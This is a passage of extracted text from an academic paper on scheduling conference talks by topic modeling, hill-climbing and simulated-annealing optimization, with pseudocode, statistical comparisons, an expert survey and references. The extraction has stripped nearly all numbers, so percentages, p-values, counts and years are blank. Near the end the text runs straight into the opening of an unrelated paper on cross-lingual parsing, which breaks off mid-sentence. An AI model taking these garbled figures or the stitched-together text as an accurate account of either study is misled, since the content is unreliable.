we generated. although our ultimate goal was to apply our methods to the manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table parameters for the ecology and evolution conferences. parameter ecology evolution number of days (w) number of talks to be scheduled (q) , number of timeslots (n) maximum number of concurrent sessions per timeslot (cmax) (w ,w ,w ), (w ) maximum number of talks per session (tmax) scheduling constraints to be accommodated none evolution conference, previous evolution conferences could not be used for testing since talk abstracts were not a part of submissions in previous years. the main structural difference between the two datasets is that no scheduling constraints were available for ecology . algorithm : hill climbing optimization algorithm (hca) input: initial schedule output: optimized schedule set current schedule to input schedule; set e to maximum number of swaps; while discrimination ratio (d) increases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute d of updated schedule; if updated d > current d then accept changes; set current schedule to updated schedule; end else discard changes; end e=e− ; end return current schedule; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : hill climbing optimization algorithm (hcb) input: initial schedule output: intra-session optimized schedule set current schedule to input schedule; set e to maximum number of swaps; while mean intra-session similarity (sw) increases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute sw of updated schedule; if updated sw > current sw then accept changes; set current schedule to updated schedule; end else discard changes; end e=e− ; end set intra-session optimized schedule to current schedule; input: intra-session optimized schedule output: optimized schedule set e to maximum number of swaps; set current schedule to input schedule; while mean inter-session similarity (sb) decreases or e > do select two sessions from the input schedule at random; swap the two sessions; if updated schedule does not violate constraints then compute sb of updated schedule; if updated sb < current sb then accept changes; set current schedule to updated schedule; end else discard changes; end e=e− ; end return current schedule ; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ecology topic models were created using the lda algorithm for , , , and topics on the corpus of talks. each topic model was evaluated based on two criteria: ( ) match percentage and ( ) manual examination of the topics and topic words associated with each talk. we obtained match percentages of . % (for topics), . % ( ), . % ( ) and % ( ). the topic model with topics was judged to be the best model for the data. subsequently, this topic model was used to compute a talk similarity matrix that contained a similarity score for all pairs of talks in the dataset. the talk similarity matrix was computed using cosine similarity between the topic relevance vectors of any two talks (eq. ( )). algorithm : simulated annealing optimization algorithm (saa) input: initial schedule output: optimized schedule set e to maximum number of swaps; set best d to d of input schedule; set current schedule, best schedule to input schedule; while discrimination ratio (d) increases or e > do select two talks from the input schedule at random; swap the two talks; if updated schedule does not violate constraints then compute d of updated schedule; compute probability of accepting updated schedule using kirkpatrick accep- tance probability function; r=random number between and ; if acceptance probability > r then accept changes; set current schedule to updated schedule; compute d of updated schedule; if updated d > current d then set best schedule to updated schedule end else discard changes; end else discard changes; end e=e− ; end return best schedule; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : simulated annealing optimization algorithm (sab) input: initial schedule output: optimized schedule set e to maximum number of swaps; set best sw to sw of input schedule; set current schedule, best schedule to input schedule; while mean inter-session similarity (sw) increases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute sw of updated schedule; compute probability of accepting updated schedule using kirkpatrick acceptance probability function; r=random number between and ; if acceptance probability > r then accept changes; set current schedule to updated schedule; if updated sw > best sw then best sw = updated sw; best schedule = updated schedule; end else discard changes; end else discard changes; end e=e− ; end set intra-session optimized schedule = best schedule; input: intra-session optimized schedule output: optimized schedule set e to maximum number of swaps; set current schedule, best schedule to input schedule; set best sb to sb of input schedule; while mean inter-session similarity (sb) decreases or e > do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute sb of updated schedule; compute probability of accepting updated schedule using kirkpatrick acceptance probability function; r= -(random number between and ); if acceptance probability > r then accept changes; set current schedule to updated schedule; if updated sb < best sb then best sb = updated sb; best schedule = updated schedule; end else discard changes; end else discard changes; end e=e− ; end return best schedule; manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. random manual greedy ilp schedule creation algorithm m e a n d is c ri m in a ti o n ra ti o starting schedules hca saa hcb sab figure mean discrimination ratio of the starting and final ecology schedules for the four opti- mization approaches applied to each of the random, manual, greedy, and ilp initial schedules. error bars show two standard errors of the mean discrimination ratio among the starting or final schedules. full-size doi: . /peerjcs. /fig- fifty each of random, greedy, and ilp schedules were created in addition to the manually created ecology schedule. the schedule with the highest discrimination ratio among the runs was taken to be the solution for each combination of starting schedule and stochastic optimization algorithm. the discrimination ratios of the initial and final optimized schedules are shown in fig. . both the greedy and ilp initial schedules outperformed the manual schedule while the random schedule did not. all four optimization approaches improved upon the initial schedules. the highest relative improvement was seen on the random schedules (about eight-fold) while a two-fold improvement was seen relative to the other three initial schedules, yet the final schedules had very similar discrimination ratios irrespective of the initial schedule. among the optimization approaches, the overall best results were obtained with saa, closely followed by hca, on all initial schedules. thus, the two approaches optimizing directly and continuously for d outperformed those that sequentially optimized for within-session similarity followed by between-session disparity. we compared the d distributions using a student’s t-test across final schedules created hc and sa approaches with different initial schedules to investigate if there are any significant differences in performances. we found statistically significant differences between sa and hc versions for the majority of starting schedules at the bonferroni- corrected threshold of α= . (table , rows – ). no significant differences were found between hca and saa with a random starting schedule and between hcb and sab with an ilp starting schedule (table , rows , ). we also compared the performance of a and b versions of the hc and sa approaches with the four initial schedules. statistically significant differences were found between a manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of hc and sa approaches, and, a and b variants of hc and sa with four differ- ent initial schedules. comparisons are made on the distributions of d for the final ecology opti- mized schedules produced by each approach. shown are p-values from two-sided un-paired t-tests at the bonferroni-corrected threshold of α= . (experiment-wide α= . for n= ). initial schedule comparison p comparing hc with sa versions random hca vs. saa . manual hca vs. saa . e− greedy hca vs. saa . e− ilp hca vs. saa . random hcb vs. sab . e− manual hcb vs. sab . e− greedy hcb vs. sab . e− ilp hcb vs. sab . comparing a with b variants random hca vs. hcb . e− manual hca vs. hcb . e− greedy hca vs. hcb . e− ilp hca vs. hcb . e− random saa vs. sab . e− manual saa vs. sab . e− greedy saa vs. sab . e− ilp saa vs. sab . e− and b versions for both hc and sa approaches across all four starting schedules (table , rows – ). evolution topic models were created from the corpus of , talks using the lda algorithm for , , , and topics. we obtained match percentages of . % (for topics), . % ( ), . % ( ) and . % ( ). based on the match percentage of the four models and manual inspection of the generated topics, the model with topics was chosen to compute talk similarity for the evolution corpus. during the test runs conducted on the ecology dataset, we observed that there was little variation between different parallel runs within the same algorithm (fig. ). knowing this, and considering the larger size of the evolution dataset, we reduced the number of parallel runs for each optimization algorithm to . since the ecology results showed that the initial schedule had no discernible affect on the final optimized schedule, we only report the results of optimization on random starting schedules with and without constraints. the results are shown in fig. . the relative ordering of the approaches is identical to ecology , with the highest performance shown by saa followed closely by hca. interestingly, the inclusion of constraints did not lead to a reduction in the discrimination ratios; in fact, the highest discrimination ratio ( . ) was obtained in the presence of constraints. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. no constraints with constraints schedule creation algorithm m e a n d is c ri m in a ti o n ra ti o starting schedules hca saa hcb sab figure mean discrimination ratio of starting and optimized evolution schedules for the four optimization approaches applied to random initial schedules with and without constraints. error bars show two standard errors of the mean discrimination ratio among the starting or final schedules. full-size doi: . /peerjcs. /fig- table comparison of hc and sa approaches, and, a and b variants of hc and sa with four dif- ferent initial schedules. comparisons are made on the distributions of d for final evolution opti- mized schedules produced by each approach. shown are p-values from two-sided un-paired t-tests at the bonferroni-corrected threshold of α= . (experiment-wide alpha= . with n= ). initial schedule comparison p comparing hc with sa versions random hca vs. saa . e− random hcb vs. sab . e− random with constraints hca vs. saa . e− random with constraints hcb vs. sab . e− comparing a with b variants random hca vs. hcb . e− random with constraints hca vs. hcb . e− random saa vs. sab . e− random with constraints saa vs. sab . e− we compared the d distributions using a student’s t-test across final schedules created hc and sa approaches with a random initial schedule. statistically significant differences were found between sa and hc versions with a random initial schedule both with and without additional scheduling constraints (table , rows – ). we also compared the performance of a and b variants of the hc and sa approaches. statistically significant differences were found between a and b versions for both hc and sa approaches both with and without scheduling constraints (table , rows – ). preliminary labels can be generated for the automated sessions using information from the topic model. for example, for each talk in a session, we can determine the top two manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. words from the top two relevant topics that describe the talk the best. this would result in a set of four words (assuming no redundancies) that represent each talk. the most frequently occurring words among the talks can be used to create a preliminary label, which can then be used to construct a session name by program organizers. manual modification of evolution schedule the saa schedule with constraints, reported above, was then given to the evolution program committee as a starting point. the program committee consisted of ten evolutionary biologists. based on their subjective judgments, and following manual procedures that elude easy description, the committee members made a large number of changes to the placement of talks and sessions before finalizing the schedule for the conference. in addition, the program committee added extra sessions for special symposia that were not part of the pool of contributed talks. the changes made by the program committee were substantial; . % of talk pairs that shared a session in the automated schedule were retained within the same session in the modified schedule, while . % of talk pairs placed in concurrent sessions in the modified schedule had originally been placed together in the automated schedule. the value of d for the original automated schedule was . , while that for the manually modified schedule was . . expert evaluation the differences between the automated and manually modified evolution schedule provided an opportunity to conduct a human evaluation. we were particularly interested in comparing how tempted users would be to hop between sessions in each case. to that end, we presented a set of volunteers with expertise in evolutionary biology, none of whom served on the program committee, with faux schedules compiled from the two different sources. responses were captured via an online survey (university of north carolina at chapel hill institutional review board - ). the respondents, recruited individually, included twenty-four early career researchers (graduate students and postdoctoral associates) and five faculty. respondents were presented with one of eight faux schedules. each schedule consisted of two timeslots. first, two timeslots each were randomly selected from the automated schedule and the manually modified schedule. these were then combined to produce all eight possible schedules consisting of one timeslot from the automated schedule and one from the modified schedule (fig. ). each timeslot contained concurrent sessions, and each session had a maximum of five talks. each respondent was randomly assigned one of the faux conference schedules and a corresponding book of abstracts. testing was blind in the sense that respondents were aware of the purpose of the study but not of which timeslot originated from which source (automated or manual). the survey contained two groups of questions. first, we asked respondents to select the five talks they would like to attend within each timeslot, irregardless of whether they were assigned to the same session. we could then compare the automated or modified timeslots with respect to how the selected talk pairs were grouped into common sessions. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure generation of faux schedules for human evaluation. (a) the original automated and manually modified schedules are depicted here for purposes of illustration with six timeslots each. (b) two timeslots from each schedule in (a) are randomly selected. (c) the eight possible schedules consisting of one each of the automated and modified timeslots. full-size doi: . /peerjcs. /fig- secondly, we asked respondents to choose one session to attend in its entirety in each timeslot and report on the difficulty of finding a session where all the talks interested them. responses were scored on a likert scale of one to five with one being ‘‘very difficult’’, and five being ‘‘very easy’’. these responses could then be used to compare the topical coherence of the sessions from the automated and modified schedules. if either of the schedules (automated or modified) were more effective than the other at capturing the topics of relevance to our sample of mock conference attendees, we would expect to see respondents (a) select more talks in the same session(s) and (b) select higher values on the likert scale for timeslots from that schedule. with respect to (a), we found no significant difference in the number of same-session talk pairs between the automated and manual timeslots (unpaired t-test t =− . , p= . , n= ). with respect to (b), the responses for the automated and manually modified timeslots were quite similar in distribution (fig. ). the mode for the automated timeslots was four while that for the modified timeslots was three. two respondents rated the selection ‘‘very easy’’ for the modified timeslot while none did for the automated one. while the expert evaluation does not reveal substantial differences between the automated and manually modified schedule in terms of preference by the survey takers, the limited size of the survey should be noted. discussion manual scheduling of conferences is complicated, time intensive, and may often result in a suboptimal schedule with sessions that could be more topically coherent and timeslots in which sessions could be more topically disparate. here, we have proposed and tested a strategy for automating the conference scheduling problem. in our approach, we first use topic modeling to identify latent topics and use the resulting weight vectors to measure similarity among talks and sessions. stochastic optimization is then used to generate schedules according to the discrimination ratio, which simultaneously quantifies within-session coherence and between-session disparity. in a comparison of different approaches for generating starting schedules and improving upon them, we found that integer linear programming produced the best starting schedule, but that further stochastic optimization greatly improved upon the solution found by ilp. manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure responses of mock conference attendees when asked to rate the ease or difficulty of selecting a single session when presented with faux schedules containing one timeslot each from the automated and manually modified evolution schedules. the scale ranges from one (very difficult) to five (very easy). full-size doi: . /peerjcs. /fig- we attribute the inability of ilp to maximize the discrimination ratio to the heuristic compromise of splitting the problem into smaller sub-problems, which was necessitated by the size of the real-world problem instances. we also found that the initial schedule had little to no effect on the discrimination ratio of the final schedule. thus, we recommend using a random or greedy algorithm to generate the starting schedule, since these approaches are less computationally expensive and easier to implement. we found that simulated annealing performed better than naive hill climbing as a stochastic optimization strategy. if the results we obtained for the ecology dataset are representative, and we accept the discrimination ratio is a reasonable objective function, then it appears that manually generated schedules can be far from optimal. this could be due to a number of reasons, apart from the obvious explanation that the combinatorial space of possible schedules is too large for humans to effectively search and evaluate. we cannot exclude that human conference organizers weigh additional factors (e.g., aiming for presenters within a session to represent a mix of different career stages). we would expect some difference between human perception of talk similarity and the inference of the same based on a topic model. and we would also expect a difference in how humans weigh coherence within sessions and disparity between sessions. in fact, we did receive feedback from evolution organizers that we should consider coherence first and disparity second. however, we saw that schedules produced in this way were inferior as judged by the discrimination ratio, although we do not know if they would be judged inferior by humans. this might be due to the way the algorithm operates—optimizing coherence within sessions first without regard to disparity between concurrent sessions. once the coherence with sessions has been optimized, the algorithm is not allowed to change the placement of talks in sessions to maximize disparity but can only manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. change the placement of the concurrent sessions with respect to each other. this results in a smaller search space for increasing disparity between concurrent sessions which might lead to lower d scores for schedules produced using these approaches. scheduling constraints are a regular feature of conferences, and initially we anticipated that they would be more troublesome than they ultimately proved to be. we found no decrease in discrimination ratio when incorporating constraints in the evolution schedule. we hypothesize that the applied scheduling constraints were not restrictive enough to substantially limit the search space. for context, while approximately % of the talks had scheduling constraints, the majority could still be placed in % of sessions. in cases where constraints are more restrictive, one could modify the approach here to accept solutions that minimize the number of constraints violated, or weight the constraints such that solutions aim to minimize the total weight of violated constraints. with the evolution schedule, we took advantage of the opportunity to conduct a preliminary investigation into how much session-hopping users felt would be necessary in the automated schedule versus the manually modified one. by the two measures we looked at, prospective conference goers with expertise in the field found the two schedules to be comparable. given the substantial changes made to the automated schedule, it was perhaps surprising that results did not show greater differences. one possible interpretation of this result is that while the conference organizers may have modified the schedule in an effort to optimize their own subjective similarity and disparity measures, they did not improve upon the automated schedule from the perspective of a community of conference attendees with diverse interests. this also suggests that it would be reasonable for future conference organizers to use an automated schedule as is, without expending additional human effort vainly trying to improve upon it. however, a number of limitations with this experiment should be noted. the sample size was small and a limited array of schedules were presented for evaluation. while all survey participants had expertise in some area of evolutionary biology, we might have been asking them to evaluate sessions outside of their specific interests. and they were tested in an artificial setting; their behavior in navigating a real conference schedule may differ. taken together, we believe this work makes a number of contributions. first, topic modeling provides a reasonable input for automated clustering of conference abstracts. the scalability of this approach is attractive for large conferences. secondly, d is a reasonable objective function, though a difficult one for humans to manually optimize. it’s value lies in capturing both similarity within and dissimilarity between sessions, the latter of which has been previously neglected. third, we have identified fast heuristics for optimizing d. future work would it be possible to improve upon this approach such that an automated schedule would be preferred by a future organizing committee to a manually generated, or manually modified, schedule? one area for potential improvement would be to customize the weights given to topics based on the perceived importance of conference attendees. in the approach described here, each topic received equal weight. however, a community of scientists may manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. consider some topics more important than others. values for the weights could be gathered by means of a survey or other user-contributed data. if topics were mapped to an ontology, weights related to the information content of topics could provide an indirect measure of importance (resnik, ) without the need for a survey. given the comparable performance of the automated and manually modified evolution schedules, it would be of interest to further examine how well statistical measures of topic similarity between talks match human perception. for similarity measures that do match well, it would then be of interest to see how sensitive humans are to schedules with very different levels of d, or to independently varying levels of similarity within sessions and dissimilarity between sessions. another pair of factors not considered was co-author and co-citation networks. intuitively, talks that are closely linked in either kind of network may be similar in ways that are somewhat independent of how they are related by the topic model (yan & ding, ). use of such network information could also help ensure that talks by individuals with strong intellectual ties are assigned to the same session or at least not assigned to different concurrent sessions. our implementation limits concurrent sessions to those that overlap fully. conferences sometimes schedule sessions of differing lengths that partially overlap with one another, and accommodating this in future versions could allow for greater flexibility. the heuristic approaches presented here have not been evaluated with respect to an exact approach with an optimality guarantee. future work may consider developing exact approaches, such as mixed-integer linear programming, to better understand the computational bounds of these approaches and investigate if the heuristics proposed here are substantially faster as compared to exact approaches and if the solutions are comparable. conclusions automated scheduling of large conferences is a problem of great interest and utility to scientists across various domains. here, we presented heuristic algorithms for the creation and optimization of conference schedules with concurrent sessions based on an objective function. the methods presented here are capable of ‘‘reading’’ conference talks, assessing similarities between the talks, and using those similarities to populate conference sessions. while these methods are a step forward in the field of automated conference scheduling, further work is needed to develop objective functions that accurately reflect user perception of ‘‘good’’ conference schedules. data and software availability data and software for this work are available at https://doi.org/ . /zenodo. . acknowledgements we wish to thank j scott provan for his guidance on implementing the ilp schedule creation approach. we thank the evolution program committee (j cryan, e lacey, manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. k pfennig, b langerhans, c mcclain, b o’meara, a rodrigo, m servedio, j shaw and j thorne) for their time and expertise in preparing the final evolution schedule from our automated preliminary schedule. we thank our survey participants who enabled us to enable comparisons of the automated and manual schedules. finally, we extend our thanks to christian santiago, daphne klotsa, david egolf, itai cohen, john crocker, karen daniels, michelle driscoll, and peter olmsted from the american physical society for providing pictures of preparing the schedule for their meeting. additional information and declarations funding this work was supported by the national evolutionary synthesis center and the national science foundation through ef- and dbi- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national evolutionary synthesis center and the national science foundation: ef- , dbi- . competing interests todd j. vision is an academic editor for peerj. katherine lamm is employed by roi revolution, inc. author contributions • prashanti manda conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • alexander hahn performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, approved the final draft. • katherine beekman conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, approved the final draft. • todd j. vision conceived and designed the experiments, contributed reagents/material- s/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the university of north carolina at chapel hill granted irb approval for a survey conducted as part of this study (irb - ). manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: data and software for this work are available at zenodo: manda, prashanti, hahn, alexander, lamm, katherine, & vision, todd. ( , may ). avoiding ’’conflicts of interest’’: a computational approach to scheduling parallel conference tracks and its human evaluation - data and software. zenodo. http://doi.org/ . /zenodo. . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andré p, zhang h, kim j, chilton l, dow sp, miller rc. . community clustering: leveraging an academic crowd to form coherent conference sessions. in: first aaai conference on human computation and crowdsourcing. bhardwaj a, kim j, dow s, karger d, madden s, miller r, zhang h. . attendee- sourcing: exploring the design space of community-informed conference scheduling. in: second aaai conference on human computation and crowdsourcing. blei dm, lafferty jd. . correlated topic models. in: proceedings of the th interna- tional conference on neural information processing systems. – . blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research : – . bosch r, trick m. . integer programming. in: search methodologies. boston: springer, – . celebi me, kingravi ha, vela pa. . a comparative study of efficient initialization methods for the k-means clustering algorithm. expert systems with applications ( ): – doi . /j.eswa. . . . chang j, blei dm. . relational topic models for document networks. in: interna- tional conference on artificial intelligence and statistics. – . chang j, gerrish s, wang c, boyd-graber jl, blei dm. . reading tea leaves: how humans interpret topic models. in: advances in neural information processing systems. – . chilton lb, kim j, andré p, cordeiro f, landay ja, weld ds, dow sp, miller rc, zhang h. . frenzy: collaborative data organization for creating conference sessions. in: proceedings of the nd annual acm conference on human factors in computing systems. – . edis e, edis rs. . an integer programming model for the conference timetabling problem-konferans çizelgeleme problemi için bir tamsayili programlama modeli. celal bayar Üniversitesi fen bilimleri dergisi ( ): – . eglese r, rand g. . conference seminar timetabling. journal of the operational research society ( ): – doi . /jors. . . manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /jors. . http://dx.doi.org/ . /peerj-cs. fox c. . a stop list for general text. in: acm sigir forum, vol. . new york: association for computing machinery, – . gay dm, kernighan bw. . ampl: a modeling language for mathematical program- ming. duxbury-thomson : – . gonzalez tf. . clustering to minimize the maximum intercluster distance. theoreti- cal computer science : – doi . / - ( ) - . gulati m, sengupta a. . tracs: tractable conference scheduling. in: proceedings of the decision sciences institute annual meeting (dsi ). – . hillis dm. . evolution : the good, the better, and the future. available at http: //treethinkers.org/evolution- -the-good-the-better-and-the-future/ . houlding b, haslett j. . scheduling parallel conference sessions: an application of a novel hybrid clustering algorithm for ensuring constrained cardinality. journal of applied statistics ( ): – doi . / . . . ibrahim h, ramli r, hassan mh. . combinatorial design for a conference: con- structing a balanced three-parallel session schedule. journal of discrete mathematical sciences and cryptography ( ): – doi . / . . . kim j, zhang h, andré p, chilton lb, bhardwaj a, karger d, dow sp, miller rc. . cobi: community-informed conference scheduling. in: first aaai conference on human computation and crowdsourcing. kirkpatrick s, gelatt cd, vecchi mp. . optimization by simulated annealing. science ( ): – doi . /science. . . . kruskal jb. . on the shortest spanning subtree of a graph and the traveling salesman problem. proceedings of the american mathematical society ( ): – doi . /s - - - - . le page y. . optimized schedule for large crystallography meetings. journal of applied crystallography ( ): – doi . /s . lovins jb. . development of a stemming algorithm. mit information processing group, electronic systems laboratory. nicholls m. . a small-to-medium-sized conference scheduling heuristic incorporat- ing presenter and limited attendee preferences. journal of the operational research society ( ): – doi . /palgrave.jors. . porter m. . snowball: a language for stemming algorithms. available at https:// tartarus.org/martin/porterstemmer/index.html. porter mf. . an algorithm for suffix stripping. program ( ): – doi . /eb . potthoff rf, munger mc. . use of integer programming to optimize the scheduling of panels at annual meetings of the public choice society. public choice ( – ): – doi . /a: . quesnelle j, steffy d. . scheduling a conference to minimize attendee preference conflicts. in: proceedings of the th multidisciplinary international conference on scheduling: theory and applications (mista). – . manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://treethinkers.org/evolution- -the-good-the-better-and-the-future/ http://treethinkers.org/evolution- -the-good-the-better-and-the-future/ http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /s - - - - http://dx.doi.org/ . /s http://dx.doi.org/ . /palgrave.jors. https://tartarus.org/martin/porterstemmer/index.html https://tartarus.org/martin/porterstemmer/index.html http://dx.doi.org/ . /eb http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. resnik p. . using information content to evaluate semantic similarity in a taxon- omy. in: proceedings of the th international joint conference on artificial intelligence. – . sampson se. . practical implications of preference-based conference scheduling. production and operations management ( ): – doi . /j. - . .tb .x. spall jc. . stochastic optimization. in: handbook of computational statistics. heidelberg: springer-verlag, – . stidsen t, pisinger d, vigo d. . scheduling euro-k conferences. european journal of operational research ( ): – doi . /j.ejor. . . . tanaka m, mori y. . a hybrid grouping genetic algorithm for timetabling of conference programs. in: proceedings of the th international conference on the practice and theory of automated timetabling (patat ). – . tanaka m, mori y, bargiela a. . granulation of keywords into sessions for timetabling conferences. in: proceedings of soft computing and intelligent systems (scis ). – . vangerven b, ficker am, goossens dr, passchyn w, spieksma fc, woeginger gj. . conference scheduling—a personalized approach. omega : – doi . /j.omega. . . . wallach hm. . topic modeling: beyond bag-of-words. in: proceedings of the rd international conference on machine learning. acm, – doi . / . . yan e, ding y. . scholarly network similarities: how bibliographic coupling networks, citation networks, cocitation networks, topical networks, coauthorship networks, and coword networks relate to each other. journal of the american society for information science and technology : – doi . /asi. . manda et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.omega. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /peerj-cs. multilingual projection for parsing truly low-resource languages željko agić♥ anders johannsen♥ barbara plank♥♣ héctor martı́nez alonso♥♠ natalie schluter♥♦ anders søgaard♥ ♥ center for language technology, university of copenhagen, denmark ♣ center for language and cognition, university of groningen, the netherlands ♠ univ. paris diderot, sorbonne paris cité – alpage, inria, france ♦ mobilepay, copenhagen, denmark {zeljko.agic,soegaard}@hum.ku.dk abstract we propose a novel approach to cross-lingual part-of-speech tagging and dependency pars- ing for truly low-resource languages. our an- notation projection-based approach yields tag- ging and parsing models for over lan- guages. all that is needed are freely avail- able parallel texts, and taggers and parsers for resource-rich languages. the empirical evalu- ation across test languages shows that our method consistently provides top-level accu- racies, close to established upper bounds, and outperforms several competitive baselines. introduction state-of-the-art approaches to inducing part-of- speech (pos) taggers and dependency parsers only scale to a small fraction of the world’s ∼ , lan- guages. the major bottleneck is the lack of man- ually annotated resources for the vast majority of these languages, including languages spoken by mil- lions, such as marathi ( m), hausa ( m), and kur- dish ( m). cross-lingual transfer learning—or sim- ply cross-lingual learning—refers to work on using annotated resources in other (source) languages to induce models for such low-resource (target) lan- guages. even simple cross-lingual learning tech- niques outperform unsupervised grammar induction by a large margin. most work in cross-lingual learning, however, makes assumptions about the availability of linguis- tic resources that do not hold for the majority of low-resource languages. the best cross-lingual de- pendency parsing results reported to date were pre- sented by rasooli and collins ( ). they use the intersection of languages covered in the google dependency treebanks project and those contained in the europarl corpus. consequently, they only consider closely related indo-european languages for which high-quality tokenization can be obtained with simple heuristics. in other words, we argue that recent approaches to cross-lingual pos tagging and dependency pars- ing are biased toward indo-european languages, in particular the germanic and romance families. the bias is not hard to explain: treebanks, as well as large volumes of parallel data, are readily available for many germanic and romance languages. several factors make cross-lingual learning between these languages easier: (i) we have large volumes of rela- tively representative, translated texts available for all language pairs; (ii) it is relatively easy to segment and tokenize germanic and romance texts; (iii) these languages all have very similar word order, making the alignments much more reliable. there- fore, it is more straightforward to train and evaluate cross-lingual transfer models for these languages. however, this bias means that we possibly over- estimate the potential of cross-lingual learning for truly low-resource languages, i.e., languages with no supporting tools or resources for segmentation, pos tagging, or dependency parsing. the aim of this work is to experiment with cross- lingual learning via annotation projection, making minimal assumptions about the available linguistic resources. we only want to assume what we can in fact assume for truly low-resource languages. thus, for the target languages, we do not assume the avail- transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris quirk. submission batch: / ; revision batch: / ; / ; / ; published / . c© association for computational linguistics. distributed under a cc-by . license. ability of any labeled data, tag dictionaries, typo- logical information, etc. for annotation projection, we need a parallel corpus, and we therefore have to rely on resources such as the bible (parts of which are available in , languages), and publications from the watchtower society (up to languages). these texts have the advantage of being translated both conservatively and into hundreds of languages (massively multi-parallel). however, the bible and the watchtower are religious texts and are more bi- ased than the corpora that have been assumed to be available in most previous work. in order to induce high-quality cross-lingual transfer models from noisy and very limited data, we exploit the fact that the available resources are massively multi-parallel. we also present a novel multilingual approach to the projection of depen- dency structures, projecting edge weights (rather than edges) via word alignments from multiple sources (rather than a single source). our approach enables us to project more information than previ- ous approaches: (i) by postponing dependency tree decoding to after the projection, and (ii) by exploit- ing multiple information sources. our contributions are as follows: (i) we present the first results on cross-lingual learning of pos taggers and dependency parsers, assuming only linguistic resources that are available for most of the world’s writ- ten languages, specifically, bible excerpts and translations of the watchtower. (ii) we extend annotation projection of syntactic dependencies across parallel text to the multi- source scenario, introducing a new, heuristics- free projection algorithm that projects weight matrices from multiple sources, rather than dependency trees or individual dependencies from a single source. (iii) we show that our approach performs signifi- cantly better than commonly used heuristics for annotation projection, as well as than delexi- calized transfer baselines. moreover, in com- parison to these systems, our approach per- forms particularly well on truly low-resource non-indo-european languages. all code and data are made freely available for general use. weighted annotation projection motivation our approach is based on the gen- eral idea of annotation projection (yarowsky et al., ) using parallel sentences. the goal is to aug- ment an unannotated target sentence with syntactic annotations projected from one or more source sen- tences through word alignments. the principle is illustrated in figure , where the source languages are german and croatian, and the target is english. the simplest case is projecting pos labels, which are observed in the source sentences but unknown in the target language. in order to induce the gram- matical category of the target word beginning, we project pos from the aligned words anfang and početku, both of which are correctly annotated as noun. projected pos labels from several sources might disagree for various reasons, e.g., erroneous source annotations, incorrect word alignments, or legitimate differences in pos between translation equivalents. we resolve such cases by taking a ma- jority vote, weighted by the alignment confidences. by letting several languages vote on the correct tag of each word, our projections become more robust, less sensitive to the noise in our source-side predic- tions and word alignments. we can also project syntactic dependencies across word alignments. if (us,vs) is a dependency edge in a source sentence, say the ingoing dependency from das to wort, us (wort) is aligned to ut (word), and vs (das) is aligned to vt (the), we can project the depen- dency such that (ut,vt) becomes a dependency edge in the target sentence, making the a dependent of word. obviously, dependency annotation projection is more challenging than projecting pos, as there is a structural constraint: the projected edges must form a dependency tree on the target side. hwa et al. ( ) were the first to consider this problem, applying heuristics to ensure well-formed trees on the target side. the heuristics were not per- fect, as they have been shown to result in excessive non-projectivity and the introduction of spurious re- lations and tokens (tiedemann et al., ; tiede- mann, ). these design choices all lead to di- https://bitbucket.org/lowlands/release 